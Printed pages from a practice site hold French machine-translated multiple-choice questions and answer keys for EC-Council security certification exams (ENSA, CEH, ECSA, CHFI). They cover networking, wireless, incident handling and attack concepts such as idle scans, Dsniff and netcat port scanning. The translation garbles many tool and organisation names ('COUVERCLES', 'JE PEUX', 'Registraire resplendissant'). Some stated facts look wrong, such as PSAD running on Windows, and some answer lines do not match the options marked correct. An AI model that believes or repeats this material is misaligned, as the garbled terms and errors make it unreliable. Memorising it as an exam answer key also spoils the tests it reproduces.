05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 2

Les options sont:

7 (correct)

Réponse: 7

EC-Council Certified Security Analyst (ECSA) Examens 2019 Set 16


Lequel des éléments suivants aide à bloquer tout le trafic entrant et / ou sortant non autorisé?

Les options sont:

Pare-feu (correct)

IDS

IPS

Renifleur

Réponse: pare - feu

Lequel des protocoles suivants est utilisé pour le routage des conversations vocales sur
Internet?

Les options sont:

DHCP

DNS

IP

VoIP (correct)

Réponse: VoIP

Lequel des protocoles suivants prend en charge la multidiffusion spécifique à la source


(SSM)?

Les options sont:

DHCP

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-2 6/7
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 2

DNS

ARP

BGMP (correct)

Réponse: BGMP

EC0-349 ECCouncil Computer Hacking Forensic Investigator Set 2


Lequel des protocoles suivants envoie un signal de bourrage lorsqu'une collision est détectée?

Les options sont:

CSMA / CD (correct)

CSMA

ALOHA

CSMA / CA

Réponse: CSMA / CD

Laquelle des normes IEEE suivantes définit la méthode d'accès prioritaire à la demande?

Les options sont:

802.3

802.15

802.12 (correct)

802.11

Réponse: 802.12

Lequel des types de câbles coaxiaux suivants est utilisé pour la télévision par câble et les
modems câble?

Les options sont:

RG-58

RG-8

RG-62

RG-59 (correct)

Réponse: RG-59

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-2 7/7
05/02/2020 ECCouncil 312-38 Administrateur de la sécurité des réseaux (ENSA) Set d'examen 3

ECCouncil 312-38 Administrateur de la sécurité des réseaux


(ENSA) Set d'examen 3
Lequel des modes de configuration de routeur suivants modifie temporairement les
paramètres du terminal, effectue des tests de base et répertorie les informations système?

Les options sont:

Utilisateur EXEC (correct)

EXEC privilégié

Configuration globale

Configuration de l'interface

Réponse: Utilisateur EXEC

ECCouncil 312-49v8 Ensemble d'examen pour enquêteurs de piratage informatique 5


Lequel des éléments suivants est un protocole d'application Internet utilisé pour transporter
les articles de presse Usenet entre les serveurs de nouvelles et pour lire et publier des articles
par les applications clientes des utilisateurs finaux?

Les options sont:

BOOTP

DCAP

NNTP (correct)

NTP

Réponse: NNTP

Laquelle des techniques suivantes permet de collecter des informations sur un réseau distant
protégé par un pare-feu?

Les options sont:

Warchalking

Numérotation de guerre

Firewalking (correct)

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-3 1/9
05/02/2020 ECCouncil 312-38 Administrateur de la sécurité des réseaux (ENSA) Set d'examen 3

Conduite de guerre

Réponse: Firewalking

Lequel des organismes suivants est le principal organisme international chargé de promouvoir
des normes coopératives pour les équipements et systèmes de télécommunications?

Les options sont:

CCITT (correct)

IEEE

JE PEUX

NIST

Réponse: CCITT

ECCouncil E-Commerce Architect EC0-232 Practice Exam Set 8


Lequel des éléments suivants est un protocole de communication qui multidiffuse des
messages et des informations entre tous les appareils membres d'un groupe de multidiffusion
IP?

Les options sont:

BGP

EGP

IGMP (correct)

ICMP

Réponse: IGMP

Lequel des câbles UTP suivants utilise quatre paires de câbles torsadés et fournit des vitesses
de transmission allant jusqu'à 16 Mbps?

Les options sont:

Catégorie 5e

Catégorie 6

Catégorie 5

Catégorie 3 (correct)

Réponse: Catégorie 3
https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-3 2/9
05/02/2020 ECCouncil 312-38 Administrateur de la sécurité des réseaux (ENSA) Set d'examen 3

Lequel des protocoles suivants est utilisé pour le routage multidiffusion inter-domaine et
prend en charge nativement la «multidiffusion spécifique à la source» (SSM)?

Les options sont:

EIGRP

BGMP (correct)

OSPF

DVMRP

Réponse: BGMP

EC0-479 EC-Council Certified Security Analyst Practice Exam Set 2


Lequel des protocoles suivants est utilisé par le protocole client / serveur RADIUS (Remote
Authentication Dial In User Service) pour la transmission de données?

Les options sont:

FCP

DCCP

FTP

UDP (correct)

Réponse: UDP

Lequel des éléments suivants est un champ 16 bits qui identifie le numéro de port source du
programme d'application dans l'hôte qui envoie le segment?

Les options sont:

Numéro d'accusé de réception

Longueur d'en-tête

Numéro de séquence

Adresse du port source (correcte)

Réponse: Adresse du port source

Lequel des éléments suivants est un protocole de passerelle extérieure qui communique à
l'aide d'un protocole TCP (Transmission Control Protocol) et envoie les informations de table

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-3 3/9
05/02/2020 ECCouncil 312-38 Administrateur de la sécurité des réseaux (ENSA) Set d'examen 3

de routeur mises à jour?

Les options sont:

BGP (correct)

IRDP

IGMP

OSPF

Réponse: BGP

ECCouncil 312-50 Kit d'examen pratique certifié Hacker éthique 7


Lequel des éléments suivants est un réseau téléphonique / de télécommunications numérique
qui achemine la voix, les données et la vidéo sur une infrastructure de réseau téléphonique
existante?

Les options sont:

PPP

X.25

RNIS (correct)

Relais de trame

Réponse: RNIS

Lequel des outils suivants examine un système pour un certain nombre de faiblesses connues
et alerte l'administrateur?

Les options sont:

Nessus

SAINT

COPS (correct)

SATAN

Réponse: COPS

Il s'agit d'un outil basé sur Windows qui est utilisé pour la détection des réseaux locaux sans
fil à l'aide des normes IEEE 802.11a, 802.11b et 802.11g. Les principales caractéristiques de

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-3 4/9
05/02/2020 ECCouncil 312-38 Administrateur de la sécurité des réseaux (ENSA) Set d'examen 3

ces outils sont les suivantes: il affiche la puissance du signal d'un réseau sans fil, l'adresse
MAC, le SSID, les détails du canal, etc. Il est couramment utilisé aux fins suivantes: a.
Conduite de guerre b. Détection des points d'accès non autorisés c .Détection des causes
d'interférence sur un WLAN d. Suivi des erreurs ICV WEP e. Création de graphiques et
d'alarmes sur les données 802.11, y compris la force du signal Cet outil est connu sous le nom
de __________.

Les options sont:

Kismet

Absinthe

NetStumbler (correct)

THC-Scan

Réponse: NetStumbler

ECCouncil 312-49 Computer Hacking Forensic Investigator Exam Set 2


Lequel des appareils suivants aide à connecter un PC à un FAI via un PSTN?

Les options sont:

Répétiteur

Carte PCI

Adaptateur

Modem (correct)

Réponse: Modem
Lequel des éléments suivants est un appareil qui reçoit un signal numérique sur un support de
transmission électromagnétique ou optique et régénère le signal le long de la jambe suivante
du support?

Les options sont:

Adaptateur de réseau

passerelle

Émetteur-récepteur

Répéteur (correct)
https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-3 5/9
05/02/2020 ECCouncil 312-38 Administrateur de la sécurité des réseaux (ENSA) Set d'examen 3

Réponse: répéteur

Lesquelles des étapes suivantes sont valides pour sécuriser les routeurs? Chaque bonne
réponse représente une solution complète. Choisissez tout ce qui correspond.

Les options sont:

Configurez les entrées de la liste d'accès pour empêcher les connexions non autorisées et
l'acheminement du trafic. (Correct)

Utilisez un mot de passe facile à retenir pour la console d'administration d'un routeur.

Utilisez un mot de passe complexe pour la console d'administration d'un routeur. (Correct)

Gardez les routeurs à jour avec les derniers correctifs de sécurité. (Correct)

Réponse: Configurez les entrées de la liste d'accès pour empêcher les connexions non autorisées
et le routage du trafic. Utilisez un mot de passe complexe pour la console d'administration d'un
routeur. Gardez les routeurs à jour avec les derniers correctifs de sécurité.

ECCouncil EC0-479 Analyste de sécurité certifié (ECSA) Set d'examen 7


Lequel des éléments suivants est un outil logiciel utilisé dans les attaques passives pour
capturer le trafic réseau?

Les options sont:

Système de détection d'intrusion

Warchalking

Sniffe (correct)

Système de prévention des intrusions

Réponse: Sniffe

Parmi les représentants suivants du processus de réponse aux incidents, lesquels sont inclus
dans l'équipe de réponse aux incidents? Chaque bonne réponse représente une solution
complète. Choisissez tout ce qui correspond.

Les options sont:

Représentant en sécurité de l'information (correct)

Représentant légal (correct)

Représentant technique (correct)

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-3 6/9
05/02/2020 ECCouncil 312-38 Administrateur de la sécurité des réseaux (ENSA) Set d'examen 3

Commercial

Enquêteur principal (correct)

Ressources humaines (correct)

Réponse: Représentant en sécurité de l'information Représentant légal Représentant technique


Chercheur principal Ressources humaines

Laquelle des attaques suivantes est une classe d'attaques par force brute qui dépend de la
probabilité plus élevée de collisions trouvées entre des tentatives d'attaque aléatoires et un
degré fixe de permutations?

Les options sont:

Attaque par dictionnaire

Rejouer l'attaque

Une attaque par phishing

Attaque d'anniversaire (correct)

Réponse: attaque d'anniversaire

ECCouncil EC0-232 ec0-232 E-Commerce Architect Practice Practice Set 8


Parmi les éléments suivants, quels sont les problèmes de sécurité courants liés aux
communications et aux e-mails? Chaque bonne réponse représente une solution
complète. Choisissez tout ce qui correspond.

Les options sont:

Écoute (correcte)

Modification du message (correct)

Relecture du message (correct)

Faux message (correct)

Usurpation d'identité (correcte)

Répudiation des messages (correct)

Réponse: Écoute clandestine Modification du message Rejouer le message Faux message


Usurpation d'identité Répudiation du message

Lequel des éléments suivants est un protocole standard qui offre le plus haut niveau de
sécurité VPN?

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-3 7/9
05/02/2020 ECCouncil 312-38 Administrateur de la sécurité des réseaux (ENSA) Set d'examen 3

Les options sont:

L2TP

PPP

IPSec (correct)

IP

Réponse: IPSec

Lesquelles des affirmations suivantes sont vraies concernant la mémoire volatile? Chaque
bonne réponse représente une solution complète. Choisissez tout ce qui correspond.

Les options sont:

Un périphérique de stockage volatile est plus rapide dans la lecture et l'écriture de données. (Correct)

La mémoire morte (ROM) est un exemple de mémoire volatile.

Le contenu est stocké en permanence et même l'alimentation est coupée.

C'est la mémoire de l'ordinateur qui nécessite de l'énergie pour conserver les informations
stockées. (Correct)

Réponse: Un périphérique de stockage volatile est plus rapide dans la lecture et l'écriture de
données. C'est la mémoire de l'ordinateur qui nécessite de l'énergie pour conserver les informations
stockées.

ECCouncil EC0-479 Analyste de sécurité certifié (ECSA) Set d'examen 4


Lequel des éléments suivants est conçu pour détecter la présence indésirable d'incendie en
surveillant les changements environnementaux associés à la combustion?

Les options sont:

Suppression des incendies gazeux

Arroseur d'incendie

Système d'alarme incendie (correct)

Système d'extinction d'incendie

Réponse: Système d'alarme incendie

Lequel des outils suivants est décrit ci-dessous? Il s'agit d'un ensemble d'outils utilisés pour
renifler les mots de passe, le courrier électronique et le trafic HTTP. Certains de ses outils

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-3 8/9
05/02/2020 ECCouncil 312-38 Administrateur de la sécurité des réseaux (ENSA) Set d'examen 3

incluent arpredirect, macof, tcpkill, tcpnice, filesnarf et mailsnarf. Il est très efficace pour
flairer les réseaux commutés et partagés. Il utilise les outils arpredirect et macof pour basculer
entre les réseaux commutés. Il peut également être utilisé pour capturer des informations
d'authentification pour FTP, telnet, SMTP, HTTP, POP, NNTP, IMAP, etc.

Les options sont:

COUVERCLES

Libnids

Dsniff (correct)

Caïn

Réponse: Dsniff

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-3 9/9
05/02/2020 ECCouncil 312-38 Network Security Administrator (ENSA) Exam Set 4

ECCouncil 312-38 Administrateur de la sécurité du réseau (ENSA)


Set d'examen 4
Lequel des modems suivants offre une communication sans fil sous l'eau?

Les options sont:

Modem acoustique (correct)

Modem courte distance

Modem sans contrôleur

Modem optique

Réponse: Modem acoustique

ECCouncil ECSS Certified Security Specialist Practice Exam Set 6

Laquelle des étapes suivantes est requise dans une analyse inactive d'un port fermé? Chaque bonne réponse
représente une partie de la solution. Choisissez tout ce qui correspond

Les options sont:

En réponse au SYN, la cible envoie un RST. (Correct)

L'attaquant envoie un SYN / ACK au zombie. (Correct)

Le zombie ignore la TVD non sollicitée et l'ID IP reste inchangé. (Correct)

L'ID IP du zombie n'augmente que de 1. (Correct)

Réponse: En réponse au SYN, la cible envoie un RST. L'attaquant envoie un SYN / ACK au zombie. Le zombie
ignore la TVD non sollicitée et l'ID IP reste inchangé. L'ID IP du zombie n'augmente que de 1.

Dans laquelle des attaques suivantes un attaquant a-t-il réussi à insérer un logiciel ou un programme
intermédiaire entre deux hôtes communicants?

Les options sont:

Débordement de tampon

Homme au milieu (correct)

Déni de service
https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-4 1/9
05/02/2020 ECCouncil 312-38 Network Security Administrator (ENSA) Exam Set 4
Détournement de session

Réponse: l' homme au milieu

Parmi les affirmations suivantes, lesquelles sont VRAIES concernant la zone démilitarisée (DMZ)? Chaque
bonne réponse représente une solution complète. Choisissez tout ce qui correspond.

Les options sont:

Dans une configuration DMZ, la plupart des ordinateurs du LAN fonctionnent derrière un pare-feu connecté à un réseau
public comme Internet. (Correct)

Les hôtes de la DMZ ont une connectivité complète avec des hôtes spécifiques du réseau interne.

La zone démilitarisée est un sous-réseau physique ou logique qui contient et expose les services externes d'une
organisation à un plus grand réseau non approuvé. (Correct)

Le but d'une zone démilitarisée est d'ajouter une couche de sécurité supplémentaire au réseau local d'une
organisation. (Correct)

Réponse: Dans une configuration DMZ, la plupart des ordinateurs du LAN fonctionnent derrière un pare-feu
connecté à un réseau public comme Internet. La zone démilitarisée est un sous-réseau physique ou logique qui contient
et expose les services externes d'une organisation à un plus grand réseau non approuvé. Le but d'une zone
démilitarisée est d'ajouter une couche de sécurité supplémentaire au réseau local d'une organisation.

ECCouncil EC0-349 Computer Hack Forensic Investigator Exam Set 4

Jason travaille en tant qu'administrateur système pour www.company.com Inc. La société possède un
réseau Windows. Sam, un employé de l'entreprise, modifie accidentellement certaines applications et
certains paramètres système. Il se plaint à Jason que son système ne fonctionne pas correctement. Pour
résoudre le problème, Jason diagnostique les composants internes de son ordinateur et observe que
certaines modifications ont été apportées au registre informatique de Sam. Pour corriger le problème, Jason
doit restaurer le registre. Lequel des utilitaires suivants Jason peut-il utiliser pour accomplir la
tâche? Chaque bonne réponse représente une solution complète. Choisissez tout ce qui correspond.

Les options sont:

Registraire resplendissant (correct)

EventCombMT

Reg.exe (correct)

Regedit.exe (correct)

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-4 2/9
05/02/2020 ECCouncil 312-38 Network Security Administrator (ENSA) Exam Set 4

Réponse: registraire resplendissant Reg.exe Regedit.exe

Lequel des éléments suivants est un dispositif d'interconnectivité réseau qui traduit différents protocoles de
communication et est utilisé pour connecter des technologies réseau différentes?

Les options sont:

Passerelle (correcte)

Routeur

Pont

Commutateur

Réponse: passerelle

Laquelle des étapes suivantes NE rend PAS un serveur tolérant aux pannes? Chaque bonne réponse
représente une solution complète. Choisissez deux.

Les options sont:

Implémentation d'une installation de serveurs de cluster

Chiffrement des données confidentielles stockées sur le serveur (correct)

Ajout d'un disque de même taille en tant que miroir sur le serveur

Ajout d'un deuxième bloc d'alimentation

Effectuer une sauvegarde régulière du serveur (correct)

Réponse: Chiffrement des données confidentielles stockées sur le serveur Exécution d'une sauvegarde régulière
du serveur

ECCouncil 312-49 Computer Hacking Forensic Investigator Exam Set 2

Laquelle des politiques suivantes est utilisée pour ajouter des informations supplémentaires sur la sécurité
globale et sert à protéger les employés et les organisations contre l'inefficacité ou l'ambiguïté?

Les options sont:

Politique d'utilisation

Politique de sécurité spécifique au problème (correcte)

Stratégie de groupe

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-4 3/9
05/02/2020 ECCouncil 312-38 Network Security Administrator (ENSA) Exam Set 4
Politique informatique

Réponse: politique de sécurité spécifique au problème

Laquelle des six phases suivantes du processus de traitement des incidents? Chaque bonne réponse
représente une solution complète. Choisissez tout ce qui correspond.

Les options sont:

Récupération (correcte)

Leçons apprises (correct)

Identification (correcte)

Confinement (correct)

Préparation (correcte)

Éradication (correcte)

Réponse: Récupération Leçons apprises Identification Confinement Préparation Éradication

Lequel des éléments suivants est un protocole de mise en réseau informatique utilisé par les hôtes pour
récupérer les attributions d'adresses IP et d'autres informations de configuration?

Les options sont:

ARP

DHCP (correct)

Telnet

SNMP

Réponse: DHCP

ECCouncil 312-50 Certifié Ethical Hacker Certified Exam Set 8

Lequel des éléments suivants est un processus de gestion qui fournit un cadre pour promouvoir une
récupération rapide et la capacité d'une réponse efficace pour protéger les intérêts de sa marque, de sa
réputation et de ses parties prenantes?

Les options sont:

Traitement des incidents

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-4 4/9
05/02/2020 ECCouncil 312-38 Network Security Administrator (ENSA) Exam Set 4
Analyse du journal

Gestion des correctifs

Gestion de la continuité des activités (correcte)

Réponse: Gestion de la continuité des opérations

Lesquelles des adresses de classe IP suivantes ne sont pas attribuées aux hôtes? Chaque bonne réponse
représente une solution complète. Choisissez tout ce qui correspond.

Les options sont:

Classe D (correct)

Classe E (correcte)

Classe A

Classe C

Classe B

Réponse: Classe D Classe E

Lequel des éléments suivants est un outil qui s'exécute sur le système d'exploitation Windows et analyse les
messages du journal iptables pour détecter les analyses de port et tout autre trafic suspect?

Les options sont:

Nmap

PSAD (correct)

Hping

NetRanger

Réponse: PSAD

ECCouncil 312-50 Certifié Ethical Hacker Certified Exam Set 1

John travaille en tant que gestionnaire d'incident pour TechWorld Inc. Sa tâche est de mettre en place un
réseau sans fil pour son organisation. Pour cela, il doit décider des appareils et des politiques appropriés
requis pour configurer le réseau. Laquelle des phases suivantes du processus de gestion des incidents
l'aidera à accomplir la tâche?

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-4 5/9
05/02/2020 ECCouncil 312-38 Network Security Administrator (ENSA) Exam Set 4

Les options sont:

Préparation (correcte)

Récupération

Éradication

Endiguement

Réponse: Préparation

Parmi les affirmations suivantes, lesquelles sont vraies concernant les risques de sécurité? Chaque bonne
réponse représente une solution complète. Choisissez trois.

Les options sont:

Ils peuvent être atténués en examinant et en prenant des mesures responsables en fonction des risques
possibles. (Correct)

Ils peuvent être analysés et mesurés par le processus d'analyse des risques (Correct)

Ils sont considérés comme un indicateur des menaces couplées à la vulnérabilité. (Correct)

Ils peuvent être supprimés complètement en prenant les mesures appropriées

Réponse: Ils peuvent être atténués en examinant et en prenant des mesures responsables en fonction des risques
possibles. Ils peuvent être analysés et mesurés par le processus d'analyse des risques. Ils sont considérés comme un
indicateur des menaces couplées à la vulnérabilité.

Laquelle des étapes suivantes du processus OPSEC examine chaque aspect de l'opération planifiée pour
identifier les indicateurs OPSEC qui pourraient révéler des informations critiques, puis comparer ces
indicateurs avec les capacités de collecte de renseignements de l'adversaire identifiées dans l'action
précédente?

Les options sont:

Application des mesures OPSEC appropriées

Analyse des vulnérabilités (correct)

Analyse des menaces

Identification des informations critiques

Réponse: Analyse des vulnérabilités

ECCouncil EC0-479 Analyste de sécurité certifié (ECSA) Set d'examen 2

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-4 6/9
05/02/2020 ECCouncil 312-38 Network Security Administrator (ENSA) Exam Set 4

Lesquelles des affirmations suivantes sont vraies à propos d'un réseau IPv6? Chaque bonne réponse
représente une solution complète. Choisissez tout ce qui correspond.

Les options sont:

Il utilise des adresses 128 bits (correct)

Pour l'interopérabilité, les adresses IPv4 utilisent les 32 derniers bits des adresses IPv6. (Correct)

Il augmente le nombre d'adresses IP disponibles (Correct)

Il offre une authentification et une sécurité améliorées. (Correct)

Il utilise des masques de sous-réseau plus longs que ceux utilisés dans IPv4.

Réponse: il utilise des adresses 128 bits Pour l'interopérabilité, les adresses IPv4 utilisent les 32 derniers bits des
adresses IPv6. Il augmente le nombre d'adresses IP disponibles. Il offre une authentification et une sécurité améliorées.

Lesquelles des affirmations suivantes sont vraies concernant un réseau sans fil? Chaque bonne réponse
représente une solution complète. Choisissez tout ce qui correspond.

Les options sont:

Les données peuvent être partagées facilement entre les appareils sans fil. (Correct)

Il offre une mobilité aux utilisateurs pour accéder à un réseau. (Correct)

Il est facile de se connecter. (Correct)

Les données peuvent être transmises de différentes manières en utilisant les réseaux cellulaires, Mobitex, DataTAC, etc.
(Correct)

Réponse: Les données peuvent être partagées facilement entre les appareils sans fil.Il offre une mobilité aux
utilisateurs pour accéder à un réseau. Il est facile de se connecter.Les données peuvent être transmises de différentes
manières en utilisant les réseaux cellulaires, Mobitex, DataTAC, etc.
Dans laquelle des attaques suivantes les ordinateurs agissent-ils comme des zombies et travaillent ensemble
pour envoyer des messages faux, augmentant ainsi la quantité de trafic bidon?

Les options sont:

Attaque par débordement de tampon

Attaque bonk

Attaque DDoS (correcte)

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-4 7/9
05/02/2020 ECCouncil 312-38 Network Security Administrator (ENSA) Exam Set 4
Attaque de Schtroumpf

Réponse: attaque DDoS

ECCouncil 312-50 Certifié Ethical Hacker Certified Exam Set 8

Lesquelles des méthodes suivantes un appareil peut-il utiliser pour consigner des informations sur un
routeur Cisco? Chaque bonne réponse représente une solution complète. Choisissez tout ce qui correspond.

Les options sont:

Journalisation SNMP (correct)

Journalisation des terminaux (correct)

Journalisation Syslog (correct)

Journalisation en mémoire tampon (correcte)

Journalisation de la console (correct)

Journalisation NTP

Réponse: Journalisation SNMP Journalisation du terminal Journalisation Syslog Journalisation tamponnée


Journalisation de la console
Lequel des câbles UTP suivants utilise quatre paires de câbles torsadés et fournit des vitesses de
transmission allant jusqu'à 16 Mbps?

Les options sont:

Catégorie 3 (correct)

Catégorie 6

Catégorie 5e

Catégorie 5

Réponse: Catégorie 3

Adam, un pirate malveillant, vient de réussir à voler un cookie sécurisé via une attaque XSS. Il est capable
de rejouer le cookie même lorsque la session est valide sur le serveur. Laquelle des raisons suivantes est la
raison la plus probable de cette cause?

Les options sont:

Le chiffrement est effectué au niveau de la couche réseau (chiffrement de couche 1).

Aucun cryptage n'est appliqué.


https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-4 8/9
05/02/2020 ECCouncil 312-38 Network Security Administrator (ENSA) Exam Set 4
Le chiffrement est effectué au niveau de la couche application (clé de chiffrement unique). (Correct)

Un cryptage bidirectionnel est appliqué.

Réponse: Le chiffrement est effectué au niveau de la couche application (clé de chiffrement unique).

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-4 9/9
05/02/2020 ECCouncil 312-38 Ensemble d'examens de l'administrateur de la sécurité du réseau (ENSA) 5

ECCouncil 312-38 Ensemble d'examens de l'administrateur de la


sécurité du réseau (ENSA) 5
Lequel des câbles UTP suivants NE convient PAS à la transmission de données ou à l'utilisation de données
Ethernet?

Les options sont:

Catégorie 1 (correct)

Catégorie 4

Catégorie 6

Catégorie 5

Réponse: Catégorie 1

ECCouncil EC0-479 Analyste de sécurité certifié (ECSA) Set d'examen 1


Lequel des énoncés suivants est un terme décrivant l'utilisation de gaz inertes et d'agents chimiques pour
éteindre un incendie?

Les options sont:

Suppression des incendies gazeux (correct)

Système d'alarme anti-incendie

Arroseur d'incendie

Système d'extinction d'incendie

Réponse: suppression des incendies gazeux

Laquelle des commandes suivantes est utilisée pour l'analyse des ports?

Les options sont:

nc -d

nc -z (correct)

nc -t

nc -v

Réponse: nc -z

Laquelle des techniques suivantes est également appelée cartographie des points d'accès?

Les options sont:

Taraudage de fil

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-5 1/9
05/02/2020 ECCouncil 312-38 Ensemble d'examens de l'administrateur de la sécurité du réseau (ENSA) 5
Vol de guerre

Conduite de guerre (Correct)

Numérotation de guerre

Réponse: Conduite de guerre

ECCouncil 312-49v8 Computer Hacking Investigator Exam Set 6


Laquelle des normes suivantes définit Logical Link Control (LLC)?

Les options sont:

802.2 (correct)

802.4

802.3

802,5

Réponse: 802.2
Lequel des éléments suivants est un protocole d'authentification par mot de passe et d'échange de clés
obligatoire?

Les options sont:

TYPE

VRRP

DH-CHAP (correct)

PPP

Réponse: DH-CHAP

Laquelle des classes d'adresses IP suivantes fournit un maximum de seulement 254 adresses d'hôte par ID
réseau?

Les options sont:

Classe A

Classe D

Classe B

Classe C (correct)

Réponse: Classe C

ECCouncil 412-79v8 Certified Security Analyst (ECSA) Exam Set 2


Lequel des éléments suivants est le processus de gestion des incidents dans une entreprise?

Les options sont:


https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-5 2/9
05/02/2020 ECCouncil 312-38 Ensemble d'examens de l'administrateur de la sécurité du réseau (ENSA) 5
Traitement des incidents (correct)

Analyse du journal

Réponse aux incidents

Gestion des correctifs

Réponse: gestion des incidents

Lequel des réseaux sans fil suivants fournit une connectivité sur une distance allant jusqu'à 20 pieds?

Les options sont:

WWAN

WMAN

WPAN (correct)

WLAN

Réponse: WPAN
Lequel des éléments suivants est l'outil Windows le plus connu pour trouver des points d'accès sans fil
ouverts?

Les options sont:

Dsniff

Renifler

Netstumbler (correct)

Netcat

Réponse: Netstumbler

EC0-232 EC-Council E-Commerce Architect Practice Practice Set 8

Laquelle des organisations suivantes est la principale organisation internationale de normalisation pour le
World Wide Web?

Les options sont:

WASC

ANSI

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-5 3/9
05/02/2020 ECCouncil 312-38 Ensemble d'examens de l'administrateur de la sécurité du réseau (ENSA) 5
CCITT

W3C (correct)

Réponse: W3C

Lequel des éléments suivants est un chiffrement de bloc 64 bits symétrique qui peut prendre en charge des
longueurs de clé allant jusqu'à 448 bits?

Les options sont:

XOR

BLOWFISH (Correct)

HAVAL

IDÉE

Réponse: BLOWFISH

Lequel des réseaux suivants interconnecte des appareils centrés sur l'espace de travail d'une personne
individuelle?

Les options sont:

WWAN

WMAN

WLAN

WPAN (correct)

Réponse: WPAN

ECCouncil EC0-232 ec0-232 E-Commerce Architect Practice Practice Set 5


Lequel des éléments suivants est le type de règle métier documentée pour protéger les informations et les
systèmes qui stockent et traitent les informations

Les options sont:

Politique de stockage des informations

Politique de sécurité des informations (Correct)

Politique de protection des informations

Document de protection des informations

Réponse: Politique de sécurité de l'information

Laquelle des couches suivantes du modèle OSI fournit les connexions de bout en bout et la fiabilité?

Les options sont:

Couche de transport (correcte)

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-5 4/9
05/02/2020 ECCouncil 312-38 Ensemble d'examens de l'administrateur de la sécurité du réseau (ENSA) 5
Couche de session

Couche physique

Couche réseau

Réponse: couche de transport

Lequel des protocoles suivants est utilisé pour échanger des messages EDI cryptés par e-mail?

Les options sont:

HTTP

MIME

HTTPS

S / MIME (correct)

Réponse: S / MIME

ECCouncil ECSS Certified Security Specialist Practice Exam Set 6


Laquelle des normes IEEE suivantes est également appelée Transition rapide de l'ensemble de services de
base?

Les options sont:

802.11b

802.11a

802.11r (correct)

802.11e

Réponse: 802.11r

Laquelle des normes IEEE suivantes est un exemple de méthode d'accès DQDB?

Les options sont:

802.3

802,5

802.4

802.6 (correct)

Réponse: 802.6

Laquelle des couches suivantes fait référence aux protocoles de niveau supérieur utilisés par la plupart des
applications de communication réseau?

Les options sont:

Couche de transport

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-5 5/9
05/02/2020 ECCouncil 312-38 Ensemble d'examens de l'administrateur de la sécurité du réseau (ENSA) 5
Couche de lien

Couche Internet

Couche d'application (correcte)

Réponse: couche d'application

ECCouncil 312-50 Kit de test de pratique de pirate éthique certifié 7

Quelle est la taille en bits du champ En-tête suivant au format d'en-tête IPv6?

Les options sont:

8 bits (correct)

20 bits

4 bits

2 bits

Réponse: 8 bits
Lequel des programmes suivants est un programme malveillant qui ressemble à un programme normal?

Les options sont:

Ver de terre

Imitation

Cheval de Troie (correct)

Virus

Réponse: cheval de Troie

Lequel des éléments suivants est utilisé conjointement avec des détecteurs de fumée et des systèmes
d'alarme incendie pour améliorer et accroître la sécurité publique?

Les options sont:

Suppression des incendies gazeux

Arroseur d'incendie

Système d'émission gazeuse

Système d'extinction d'incendie (correct)

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-5 6/9
05/02/2020 ECCouncil 312-38 Ensemble d'examens de l'administrateur de la sécurité du réseau (ENSA) 5

Réponse: Système d'extinction d'incendie

EC-Council Certified Security Analyst (ECSA) Examens 2019 Set 13

Lequel des outils suivants est utilisé pour exécuter une commande ping sur une plage d'adresses IP donnée
et résoudre le nom d'hôte du système distant?

Les options sont:

Netscan

Hping

SuperScan (correct)

Nmap

Réponse: SuperScan

Laquelle des couches suivantes du modèle OSI assure la communication interhôte?

Les options sont:

Couche d'application

Couche de session (correcte)

Couche réseau

Couche de transport

Réponse: couche de session

Lequel des éléments suivants est susceptible d'une attaque d'anniversaire?

Les options sont:

Signature numérique (correcte)

Authentification

Autorisation

Intégrité

Réponse: signature numérique

EC0-349 ECCouncil Computer Hacking Forensic Investigator Set 13


Lequel des éléments suivants est une méthode d'authentification qui utilise des caractéristiques physiques?
https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-5 7/9
05/02/2020 ECCouncil 312-38 Ensemble d'examens de l'administrateur de la sécurité du réseau (ENSA) 5

Les options sont:

COMSEC

Biométrie (correcte)

Pot de miel

ACL

Réponse: biométrie

Lequel des éléments suivants est également appelé code de scories?

Les options sont:

Ver de terre

IRC bot

Bombe logique (correct)

troyen

Réponse: bombe logique


Lequel des éléments suivants est une attaque passive?

Les options sont:

L'accès non autorisé

Analyse du trafic (correct)

Détournement de session

Rejouer l'attaque

Réponse: Analyse du trafic

